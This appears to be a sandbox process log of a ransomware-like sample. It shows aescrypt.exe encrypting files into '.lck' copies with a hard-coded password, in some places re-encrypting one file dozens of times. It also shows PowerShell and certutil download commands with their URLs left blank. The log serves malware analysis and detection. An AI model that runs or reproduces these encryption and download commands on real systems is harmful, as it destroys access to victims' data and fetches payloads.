C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5172

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5708

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5884

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5392

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:6152

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6164

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6180

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6192

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6204

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6220

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6244

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6256

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6268

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6284

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6296

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6308

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6320

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6332

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6344

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:6368

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:6380

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:6392

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:6404

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:6416

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:6428

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:6440

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:6452

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6464

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6476

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6488

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6504

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6520

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6536

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6564

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6580

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6596

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6612

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6628

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6644

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6660

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6672

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6684

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6812

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:6920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:6952

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BroadcastMsg_1603909987.txt.lck" "BroadcastMsg_1603909987.txt"
3⤵
PID:6964

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DMIFB33.tmp.lck" "DMIFB33.tmp"
3⤵
PID:6980

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "jawshtml.html.lck" "jawshtml.html"
3⤵
PID:6996

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "kill.bat.lck" "kill.bat"
3⤵
PID:7012

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aria-debug-3308.log.lck" "aria-debug-3308.log"
3⤵
PID:7024

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "p2d.bat.lck" "p2d.bat"
3⤵
PID:7036

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "wmsetup.log.lck" "wmsetup.log"
3⤵
PID:7048

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt.lck" "dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"
3⤵
PID:7060

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AdobeSFX.log.lck" "AdobeSFX.log"
3⤵
PID:7076

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "dd_SetupUtility.txt.lck" "dd_SetupUtility.txt"
3⤵
PID:7092

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "final.exe.lck" "final.exe"
3⤵
PID:7108

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "dd_vcredistUI5B67.txt.lck" "dd_vcredistUI5B67.txt"
3⤵
PID:7120

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "chrome_installer.log.lck" "chrome_installer.log"
3⤵
PID:7136

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "JavaDeployReg.log.lck" "JavaDeployReg.log"
3⤵
PID:7152

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "wct2F16.tmp.lck" "wct2F16.tmp"
3⤵
PID:4164

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9NBLGGH4VZW5_0_0010_.Public.InstallAgent.dat.lck" "sa.9NBLGGH4VZW5_0_0010_.Public.InstallAgent.dat"
3⤵
PID:6168

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9NBLGGH5Q1ZL_0_0010_.Public.InstallAgent.dat.lck" "sa.9NBLGGH5Q1ZL_0_0010_.Public.InstallAgent.dat"
3⤵
PID:6188

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MKLUFVRL-20201028-1834.log.lck" "MKLUFVRL-20201028-1834.log"
3⤵
PID:6216

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9WZDNCRCWFTB_0_0010_.Public.InstallAgent.dat.lck" "sa.9WZDNCRCWFTB_0_0010_.Public.InstallAgent.dat"
3⤵
PID:6236

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9WZDNCRFHV4V_0_0010_.Public.InstallAgent.dat.lck" "sa.9WZDNCRFHV4V_0_0010_.Public.InstallAgent.dat"
3⤵
PID:6260

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9PHNB71MKR4J_0_0010_.Public.InstallAgent.dat.lck" "sa.9PHNB71MKR4J_0_0010_.Public.InstallAgent.dat"
3⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9NBLGGH6J6VK_0_0010_.Public.InstallAgent.dat.lck" "sa.9NBLGGH6J6VK_0_0010_.Public.InstallAgent.dat"
3⤵
PID:6304

